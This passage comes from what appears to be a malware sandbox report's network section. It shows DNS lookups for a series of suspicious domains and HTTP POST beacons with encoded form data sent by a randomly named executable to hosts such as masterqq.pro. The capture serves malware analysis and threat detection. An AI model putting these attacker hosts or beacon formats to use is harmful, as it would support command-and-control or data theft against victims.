                                                                                Nov 26, 2024 09:30:51.410985947 CET4975880192.168.2.8185.26.237.170
                                                                                Nov 26, 2024 09:30:51.572593927 CET8049758185.26.237.170192.168.2.8
                                                                                Nov 26, 2024 09:30:52.427670956 CET4975980192.168.2.8185.26.237.170
                                                                                Nov 26, 2024 09:30:52.549597025 CET8049759185.26.237.170192.168.2.8
                                                                                Nov 26, 2024 09:30:52.549714088 CET4975980192.168.2.8185.26.237.170
                                                                                Nov 26, 2024 09:30:52.564970970 CET4975980192.168.2.8185.26.237.170
                                                                                Nov 26, 2024 09:30:52.685081005 CET8049759185.26.237.170192.168.2.8
                                                                                Nov 26, 2024 09:30:54.080116034 CET4975980192.168.2.8185.26.237.170
                                                                                Nov 26, 2024 09:30:54.240576982 CET8049759185.26.237.170192.168.2.8
                                                                                Nov 26, 2024 09:30:55.098947048 CET4976080192.168.2.8185.26.237.170
                                                                                Nov 26, 2024 09:30:55.218957901 CET8049760185.26.237.170192.168.2.8
                                                                                Nov 26, 2024 09:30:55.221982956 CET4976080192.168.2.8185.26.237.170
                                                                                Nov 26, 2024 09:30:55.242955923 CET4976080192.168.2.8185.26.237.170
                                                                                Nov 26, 2024 09:30:55.362948895 CET8049760185.26.237.170192.168.2.8
                                                                                Nov 26, 2024 09:30:55.363003969 CET8049760185.26.237.170192.168.2.8
                                                                                Nov 26, 2024 09:30:56.752028942 CET4976080192.168.2.8185.26.237.170
                                                                                Nov 26, 2024 09:30:56.916757107 CET8049760185.26.237.170192.168.2.8
                                                                                Nov 26, 2024 09:30:57.771718979 CET4976180192.168.2.8185.26.237.170
                                                                                Nov 26, 2024 09:30:57.891872883 CET8049761185.26.237.170192.168.2.8
                                                                                Nov 26, 2024 09:30:57.891952991 CET4976180192.168.2.8185.26.237.170
                                                                                Nov 26, 2024 09:30:57.903362036 CET4976180192.168.2.8185.26.237.170
                                                                                Nov 26, 2024 09:30:58.023376942 CET8049761185.26.237.170192.168.2.8
                                                                                Nov 26, 2024 09:31:11.823551893 CET8049758185.26.237.170192.168.2.8
                                                                                Nov 26, 2024 09:31:11.823880911 CET4975880192.168.2.8185.26.237.170
                                                                                Nov 26, 2024 09:31:14.439376116 CET8049759185.26.237.170192.168.2.8
                                                                                Nov 26, 2024 09:31:14.441425085 CET4975980192.168.2.8185.26.237.170

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Nov 26, 2024 09:27:34.451788902 CET5948153192.168.2.81.1.1.1
                                                                                Nov 26, 2024 09:27:34.934351921 CET53594811.1.1.1192.168.2.8
                                                                                Nov 26, 2024 09:27:51.208942890 CET5361853192.168.2.81.1.1.1
                                                                                Nov 26, 2024 09:27:51.565223932 CET53536181.1.1.1192.168.2.8
                                                                                Nov 26, 2024 09:28:06.130894899 CET5525153192.168.2.81.1.1.1
                                                                                Nov 26, 2024 09:28:06.652930975 CET53552511.1.1.1192.168.2.8
                                                                                Nov 26, 2024 09:28:20.943269014 CET5900453192.168.2.81.1.1.1
                                                                                Nov 26, 2024 09:28:21.580218077 CET53590041.1.1.1192.168.2.8
                                                                                Nov 26, 2024 09:28:36.021507025 CET5959853192.168.2.81.1.1.1
                                                                                Nov 26, 2024 09:28:36.927489996 CET53595981.1.1.1192.168.2.8
                                                                                Nov 26, 2024 09:28:52.208199978 CET6278753192.168.2.81.1.1.1
                                                                                Nov 26, 2024 09:28:52.613905907 CET53627871.1.1.1192.168.2.8
                                                                                Nov 26, 2024 09:29:00.682449102 CET5329453192.168.2.81.1.1.1
                                                                                Nov 26, 2024 09:29:01.066418886 CET53532941.1.1.1192.168.2.8
                                                                                Nov 26, 2024 09:29:15.349103928 CET4995553192.168.2.81.1.1.1
                                                                                Nov 26, 2024 09:29:16.275991917 CET53499551.1.1.1192.168.2.8
                                                                                Nov 26, 2024 09:29:31.318180084 CET6498753192.168.2.81.1.1.1
                                                                                Nov 26, 2024 09:29:31.806231976 CET53649871.1.1.1192.168.2.8
                                                                                Nov 26, 2024 09:29:46.239993095 CET5368053192.168.2.81.1.1.1
                                                                                Nov 26, 2024 09:29:46.893877983 CET53536801.1.1.1192.168.2.8
                                                                                Nov 26, 2024 09:30:01.509212017 CET5697253192.168.2.81.1.1.1
                                                                                Nov 26, 2024 09:30:02.519387960 CET5697253192.168.2.81.1.1.1
                                                                                Nov 26, 2024 09:30:03.520962954 CET5697253192.168.2.81.1.1.1
                                                                                Nov 26, 2024 09:30:03.721390009 CET53569721.1.1.1192.168.2.8
                                                                                Nov 26, 2024 09:30:03.721419096 CET53569721.1.1.1192.168.2.8
                                                                                Nov 26, 2024 09:30:03.721487045 CET53569721.1.1.1192.168.2.8
                                                                                Nov 26, 2024 09:30:18.442737103 CET5557753192.168.2.81.1.1.1
                                                                                Nov 26, 2024 09:30:19.439452887 CET5557753192.168.2.81.1.1.1
                                                                                Nov 26, 2024 09:30:19.700972080 CET53555771.1.1.1192.168.2.8
                                                                                Nov 26, 2024 09:30:19.701006889 CET53555771.1.1.1192.168.2.8
                                                                                Nov 26, 2024 09:30:33.990149021 CET6234053192.168.2.81.1.1.1
                                                                                Nov 26, 2024 09:30:34.797194004 CET53623401.1.1.1192.168.2.8
                                                                                Nov 26, 2024 09:30:49.366940975 CET6105653192.168.2.81.1.1.1
                                                                                Nov 26, 2024 09:30:49.754765987 CET53610561.1.1.1192.168.2.8

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Nov 26, 2024 09:27:34.451788902 CET192.168.2.81.1.1.10x1867Standard query (0)www.dojodigitize.shopA (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:27:51.208942890 CET192.168.2.81.1.1.10xa356Standard query (0)www.masterqq.proA (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:28:06.130894899 CET192.168.2.81.1.1.10x7441Standard query (0)www.hasan.cloudA (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:28:20.943269014 CET192.168.2.81.1.1.10xfa34Standard query (0)www.0be.infoA (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:28:36.021507025 CET192.168.2.81.1.1.10x2a3fStandard query (0)www.tageting.shopA (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:28:52.208199978 CET192.168.2.81.1.1.10x5562Standard query (0)www.ulojenukw.shopA (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:29:00.682449102 CET192.168.2.81.1.1.10x3e73Standard query (0)www.ssps.shopA (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:29:15.349103928 CET192.168.2.81.1.1.10xe483Standard query (0)www.qqc5.topA (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:29:31.318180084 CET192.168.2.81.1.1.10x3023Standard query (0)www.learnnow.infoA (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:29:46.239993095 CET192.168.2.81.1.1.10x9250Standard query (0)www.goldbracelet.topA (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:30:01.509212017 CET192.168.2.81.1.1.10x8ae6Standard query (0)www.regislemberthe.onlineA (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:30:02.519387960 CET192.168.2.81.1.1.10x8ae6Standard query (0)www.regislemberthe.onlineA (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:30:03.520962954 CET192.168.2.81.1.1.10x8ae6Standard query (0)www.regislemberthe.onlineA (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:30:18.442737103 CET192.168.2.81.1.1.10x5dccStandard query (0)www.honk.cityA (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:30:19.439452887 CET192.168.2.81.1.1.10x5dccStandard query (0)www.honk.cityA (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:30:33.990149021 CET192.168.2.81.1.1.10x4487Standard query (0)www.gupiao.betA (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:30:49.366940975 CET192.168.2.81.1.1.10x382eStandard query (0)www.fengzheng.shopA (IP address)IN (0x0001)false

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Nov 26, 2024 09:27:34.934351921 CET1.1.1.1192.168.2.80x1867No error (0)www.dojodigitize.shopdojodigitize.shopCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 26, 2024 09:27:34.934351921 CET1.1.1.1192.168.2.80x1867No error (0)dojodigitize.shop15.197.142.173A (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:27:34.934351921 CET1.1.1.1192.168.2.80x1867No error (0)dojodigitize.shop3.33.152.147A (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:27:51.565223932 CET1.1.1.1192.168.2.80xa356No error (0)www.masterqq.pro172.67.213.249A (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:27:51.565223932 CET1.1.1.1192.168.2.80xa356No error (0)www.masterqq.pro104.21.23.224A (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:28:06.652930975 CET1.1.1.1192.168.2.80x7441No error (0)www.hasan.cloud13.248.169.48A (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:28:06.652930975 CET1.1.1.1192.168.2.80x7441No error (0)www.hasan.cloud76.223.54.146A (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:28:21.580218077 CET1.1.1.1192.168.2.80xfa34No error (0)www.0be.info0be.infoCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 26, 2024 09:28:21.580218077 CET1.1.1.1192.168.2.80xfa34No error (0)0be.info173.0.157.187A (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:28:36.927489996 CET1.1.1.1192.168.2.80x2a3fNo error (0)www.tageting.shop13.227.8.45A (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:28:36.927489996 CET1.1.1.1192.168.2.80x2a3fNo error (0)www.tageting.shop13.227.8.9A (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:28:36.927489996 CET1.1.1.1192.168.2.80x2a3fNo error (0)www.tageting.shop13.227.8.13A (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:28:36.927489996 CET1.1.1.1192.168.2.80x2a3fNo error (0)www.tageting.shop13.227.8.115A (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:28:52.613905907 CET1.1.1.1192.168.2.80x5562Server failure (2)www.ulojenukw.shopnonenoneA (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:29:01.066418886 CET1.1.1.1192.168.2.80x3e73No error (0)www.ssps.shop13.248.169.48A (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:29:01.066418886 CET1.1.1.1192.168.2.80x3e73No error (0)www.ssps.shop76.223.54.146A (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:29:16.275991917 CET1.1.1.1192.168.2.80xe483No error (0)www.qqc5.topqqc5.topCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 26, 2024 09:29:16.275991917 CET1.1.1.1192.168.2.80xe483No error (0)qqc5.top38.47.233.4A (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:29:31.806231976 CET1.1.1.1192.168.2.80x3023No error (0)www.learnnow.info199.192.23.123A (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:29:46.893877983 CET1.1.1.1192.168.2.80x9250No error (0)www.goldbracelet.top104.21.36.239A (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:29:46.893877983 CET1.1.1.1192.168.2.80x9250No error (0)www.goldbracelet.top172.67.201.49A (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:30:03.721390009 CET1.1.1.1192.168.2.80x8ae6No error (0)www.regislemberthe.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:30:03.721419096 CET1.1.1.1192.168.2.80x8ae6No error (0)www.regislemberthe.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:30:03.721487045 CET1.1.1.1192.168.2.80x8ae6No error (0)www.regislemberthe.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:30:19.700972080 CET1.1.1.1192.168.2.80x5dccNo error (0)www.honk.city199.59.243.227A (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:30:19.701006889 CET1.1.1.1192.168.2.80x5dccNo error (0)www.honk.city199.59.243.227A (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:30:34.797194004 CET1.1.1.1192.168.2.80x4487No error (0)www.gupiao.bet13.248.169.48A (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:30:34.797194004 CET1.1.1.1192.168.2.80x4487No error (0)www.gupiao.bet76.223.54.146A (IP address)IN (0x0001)false
                                                                                Nov 26, 2024 09:30:49.754765987 CET1.1.1.1192.168.2.80x382eNo error (0)www.fengzheng.shop185.26.237.170A (IP address)IN (0x0001)false

                                                                                HTTP Request Dependency Graph

                                                                                • www.dojodigitize.shop
                                                                                • www.masterqq.pro
                                                                                • www.hasan.cloud
                                                                                • www.0be.info
                                                                                • www.tageting.shop
                                                                                • www.ssps.shop
                                                                                • www.qqc5.top
                                                                                • www.learnnow.info
                                                                                • www.goldbracelet.top
                                                                                • www.regislemberthe.online
                                                                                • www.honk.city
                                                                                • www.gupiao.bet
                                                                                • www.fengzheng.shop

                                                                                HTTP Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.84971215.197.142.173806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:27:35.074786901 CET457OUTGET /zxe0/?ynlT=El+NSyicP5BK/60EXWXaz7evSHJwK2e1F+D0aleaH+wp2K9lM+jEhQu4F5Y51N1X01h2I0uJ1YrEHciK2w5TkBnZYNNwJ4YcRegv3/W3TWhCxoQqPNBROUFaIQ8+8cz4+g==&BZcp=FxLxsNCx3xt HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.dojodigitize.shop
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Nov 26, 2024 09:27:36.156138897 CET133INHTTP/1.1 404 Not Found
                                                                                Server: awselb/2.0
                                                                                Date: Tue, 26 Nov 2024 08:27:35 GMT
                                                                                Content-Length: 0
                                                                                Connection: close
                                                                                WAFRule: 5


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.849713172.67.213.249806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:27:51.709861040 CET707OUTPOST /vfw3/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.masterqq.pro
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.masterqq.pro
                                                                                Referer: http://www.masterqq.pro/vfw3/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 6d 6f 49 59 76 59 71 37 45 45 76 56 55 52 61 38 46 33 5a 66 5a 4a 4b 4c 54 56 49 30 37 72 41 69 57 4e 55 33 51 53 43 61 6f 76 4c 34 6a 53 47 4e 78 34 61 52 66 38 48 2b 64 44 75 6e 61 54 2f 64 67 62 56 34 61 70 34 75 67 2f 31 53 6c 2f 4e 2b 51 74 79 58 53 74 64 7a 32 6e 38 74 7a 32 31 43 5a 2b 66 77 6b 50 51 2b 74 48 51 63 47 75 44 42 41 6b 39 56 4a 39 46 4f 4a 66 39 62 6a 4c 6b 4a 41 4f 41 7a 65 48 73 35 46 46 68 39 57 42 76 42 78 55 35 36 73 56 77 76 4d 4a 4f 65 30 51 4b 77 78 48 64 66 42 50 58 75 4f 44 65 6d 4e 4b 74 78 30 4c 7a 37 6e 35 55 6e 4e 6e 51 63 50 41 54 5a 6b 43 6a 62 44 66 30 3d
                                                                                Data Ascii: ynlT=moIYvYq7EEvVURa8F3ZfZJKLTVI07rAiWNU3QSCaovL4jSGNx4aRf8H+dDunaT/dgbV4ap4ug/1Sl/N+QtyXStdz2n8tz21CZ+fwkPQ+tHQcGuDBAk9VJ9FOJf9bjLkJAOAzeHs5FFh9WBvBxU56sVwvMJOe0QKwxHdfBPXuODemNKtx0Lz7n5UnNnQcPATZkCjbDf0=
                                                                                Nov 26, 2024 09:27:53.014630079 CET1026INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 26 Nov 2024 08:27:52 GMT
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RCsFWfjLv620tjP4iq5iNp3c0bVeyRYZ1WG4e8g40Wuqx4cGzLe6T5Yr%2FeE3nMuv9GYUMaEPMkz4dAsfDOY5cyjmhbnnS4ekaI3eDYby4okFz6Wz6kXimls1F6WMGdWtuOqb"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e88807658804400-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1674&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=707&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 64 36 0d 0a 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 29 ea 81 c3 6a 25 68 52 b5 52 28 11 b8 07 8e 06 6f e5 4a 6d 9c d8 5b 22 fe 1e 25 15 12 d7 99 37 a3 19 ba ab 5e d7 f6 a3 ad 61 6b 5f 1a 68 0f cf cd 6e 0d 8b 7b c4 5d 6d 37 88 95 ad 6e ce 43 51 22 d6 fb 05 1b 0a 7a 39 33 05 71 9e 0d e9 49 cf c2 ab 72 05 fb a8 b0 89 d7 ce 13 de 44 43 38 43 f4 19 fd cf 94 5b f2 3f 26 2c d9 50 cf 36 08 24 19 ae 92 55 3c 1c de 1a 18 5d 86 2e 2a 1c 27 0e 62 07 1a 4e 19 b2 a4 6f 49 05 61 3f 35 25 36 e4 bc 4f 92 33 3f f5 ee 2b 08 bc cf 00 38 85 71 1c 8b 8b cb 2a 69 18 8a 3e 45 68 63 52 78 2c 09 ff 22 86 70 de 44 38 7f f9 05 00 00 ff ff e3 02 00 2a 59 1a 36 06 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: fd6LN0Dw)j%hRR(oJm["%7^ak_hn{]m7nCQ"z93qIrDC8C[?&,P6$U<].*'bNoIa?5%6O3?+8q*i>EhcRx,"pD8*Y60


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.849714172.67.213.249806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:27:54.465801001 CET727OUTPOST /vfw3/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.masterqq.pro
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.masterqq.pro
                                                                                Referer: http://www.masterqq.pro/vfw3/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 6d 6f 49 59 76 59 71 37 45 45 76 56 53 78 71 38 45 55 78 66 52 4a 4b 4d 4b 6c 49 30 78 4c 41 6d 57 4e 59 33 51 54 47 4b 6f 61 54 34 6b 79 32 4e 2b 63 4f 52 65 38 48 2b 58 6a 75 69 51 7a 2f 47 67 62 5a 77 61 74 34 75 67 2f 68 53 6c 39 56 2b 51 61 75 59 54 39 64 78 77 6e 38 76 33 32 31 43 5a 2b 66 77 6b 50 45 41 74 48 49 63 48 65 7a 42 41 47 56 55 50 4e 46 4e 4f 66 39 62 6e 4c 6b 46 41 4f 41 64 65 47 78 6b 46 47 56 39 57 41 66 42 79 46 35 35 69 56 77 74 50 35 50 37 7a 51 50 47 38 6d 45 39 41 2f 37 69 46 52 4c 63 46 63 63 62 75 70 37 39 6b 35 38 4d 4e 6b 34 71 4b 33 4f 78 2b 68 7a 72 64 49 6a 61 53 47 51 62 75 7a 67 52 7a 6d 47 77 33 58 6f 4a 77 73 39 51
                                                                                Data Ascii: ynlT=moIYvYq7EEvVSxq8EUxfRJKMKlI0xLAmWNY3QTGKoaT4ky2N+cORe8H+XjuiQz/GgbZwat4ug/hSl9V+QauYT9dxwn8v321CZ+fwkPEAtHIcHezBAGVUPNFNOf9bnLkFAOAdeGxkFGV9WAfByF55iVwtP5P7zQPG8mE9A/7iFRLcFccbup79k58MNk4qK3Ox+hzrdIjaSGQbuzgRzmGw3XoJws9Q
                                                                                Nov 26, 2024 09:27:55.660151958 CET1024INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 26 Nov 2024 08:27:55 GMT
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=COCxnX7ChKNOHP0FlugX7V0dAfhywGscetcl639ZtlEfw%2Fh5cHyhR4B%2BQMQJHhc6Ro%2B2QUC5vS9EsNQeCMlhSyLpc03v%2FKmGYuCNqYXlzFncb78HC2L7wYxGUMgju66RpI%2BP"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e888086d8b4c342-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1529&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=727&delivery_rate=0&cwnd=148&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 65 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 29 ea 81 c3 6a 25 68 52 b5 52 28 11 b8 07 8e 06 6f e5 4a 6d 9c d8 5b 22 fe 1e 25 15 12 d7 99 37 a3 19 ba ab 5e d7 f6 a3 ad 61 6b 5f 1a 68 0f cf cd 6e 0d 8b 7b c4 5d 6d 37 88 95 ad 6e ce 43 51 22 d6 fb 05 1b 0a 7a 39 33 05 71 9e 0d e9 49 cf c2 ab 72 05 fb a8 b0 89 d7 ce 13 de 44 43 38 43 f4 19 fd cf 94 5b f2 3f 26 2c d9 50 cf 36 08 24 19 ae 92 55 3c 1c de 1a 18 5d 86 2e 2a 1c 27 0e 62 07 1a 4e 19 b2 a4 6f 49 05 61 3f 35 25 36 e4 bc 4f 92 33 3f f5 ee 2b 08 bc cf 00 38 85 71 1c 8b 8b cb 2a 69 18 8a 3e 45 68 63 52 78 2c 09 ff 22 86 70 de 44 38 7f f9 05 00 00 ff ff e3 02 00 2a 59 1a 36 06 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e0LN0Dw)j%hRR(oJm["%7^ak_hn{]m7nCQ"z93qIrDC8C[?&,P6$U<].*'bNoIa?5%6O3?+8q*i>EhcRx,"pD8*Y60


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.849715172.67.213.249806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:27:57.140439034 CET1744OUTPOST /vfw3/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.masterqq.pro
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.masterqq.pro
                                                                                Referer: http://www.masterqq.pro/vfw3/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 6d 6f 49 59 76 59 71 37 45 45 76 56 53 78 71 38 45 55 78 66 52 4a 4b 4d 4b 6c 49 30 78 4c 41 6d 57 4e 59 33 51 54 47 4b 6f 61 62 34 6a 41 2b 4e 78 64 4f 52 59 4d 48 2b 52 54 75 6a 51 7a 2b 65 67 66 31 30 61 74 30 2b 67 38 5a 53 71 38 31 2b 59 4c 75 59 59 39 64 78 79 6e 38 75 7a 32 30 41 5a 2b 76 30 6b 50 55 41 74 48 49 63 48 63 37 42 4a 30 39 55 4e 4e 46 4f 4a 66 38 61 6a 4c 6b 70 41 4f 6f 72 65 47 31 30 5a 67 6c 39 50 67 50 42 30 33 68 35 75 56 77 72 4b 35 50 5a 7a 52 7a 56 38 6e 70 4d 41 2f 2b 4e 46 54 72 63 56 5a 6c 41 7a 64 33 37 33 70 38 49 4c 55 77 65 46 30 6e 57 39 48 6e 45 66 61 2f 33 53 78 45 31 6f 52 59 6e 2f 41 33 34 73 43 77 74 79 62 77 48 51 6f 34 6e 41 6c 61 38 48 4f 38 30 57 46 48 41 57 64 38 32 4a 46 30 54 38 33 6b 68 50 34 30 74 7a 50 45 67 6f 59 71 6a 35 79 6e 47 44 38 79 63 2f 50 6d 44 36 48 53 35 31 50 68 36 62 4f 6b 4b 51 6f 46 7a 44 45 55 4f 38 2f 2b 31 75 30 52 34 45 44 74 7a 73 68 31 74 43 49 79 31 5a 72 68 4b 58 42 31 62 39 31 54 77 37 78 49 4c 64 37 32 49 51 [TRUNCATED]
                                                                                Data Ascii: ynlT=moIYvYq7EEvVSxq8EUxfRJKMKlI0xLAmWNY3QTGKoab4jA+NxdORYMH+RTujQz+egf10at0+g8ZSq81+YLuYY9dxyn8uz20AZ+v0kPUAtHIcHc7BJ09UNNFOJf8ajLkpAOoreG10Zgl9PgPB03h5uVwrK5PZzRzV8npMA/+NFTrcVZlAzd373p8ILUweF0nW9HnEfa/3SxE1oRYn/A34sCwtybwHQo4nAla8HO80WFHAWd82JF0T83khP40tzPEgoYqj5ynGD8yc/PmD6HS51Ph6bOkKQoFzDEUO8/+1u0R4EDtzsh1tCIy1ZrhKXB1b91Tw7xILd72IQ5vCXAT/KOUofKPAzQ2/zuYUdSHP2DOdptwMSRAST2jLZUDo/n3xm6xRdgwPYjaaWB95Q5X/NzYCtbJY4B1IggFQ9mcU1IyvDrs6aA6g+yk2EnjZLV+0hx1rORoRNYuBxj7W8tbp955sgI9Qc3sOUmrHvqMEnE8/y5UJGKGRnT0EWQqrl6g8f95t85RDIdSZTIAgTCoDJmwpr7p03mgG8Snc5glWFaGvGnIHcHqM4g5YaCAFR/QeSaObx9yfr00l+qAxjpKcN4eikWUE33qHkV3Hmrwd3wTI2NCVSf3+NFgzfTHsmOrYYvUnkW0vBlKBB1wNZy4rGCF7i0+B0g5JmRe+8Cz2Ldfeq5i+w7VeX4KlyKD3DNY0tf6SnuurUMeFz6tgshalW+onettLtG600u44/gS5k+Xvw9/Uy02j8IhzevKC2e+OgwNgy7qiBG6c1B/d6wShShl4QVHpG2IEiRzv7QAa1mpVLROQTQLiZrfqbwiogdIG7+RxJ80CJ2BgZ+SYKvPS1E3SidwJCiUq1YXLKbJ3D2iUS1wOkU4iWZU8pghsQ/azk5Ir/lgPJePCOckxnSOTXWFhqub+MBdmI2BQmO9QMEU/JoFtQaT6erj1H5D44WQeJorA9FLFC7drWBNIdKUQDAnJMsEUmG+LQcdl4gttINOWHkQ [TRUNCATED]
                                                                                Nov 26, 2024 09:27:58.458396912 CET1028INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 26 Nov 2024 08:27:58 GMT
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
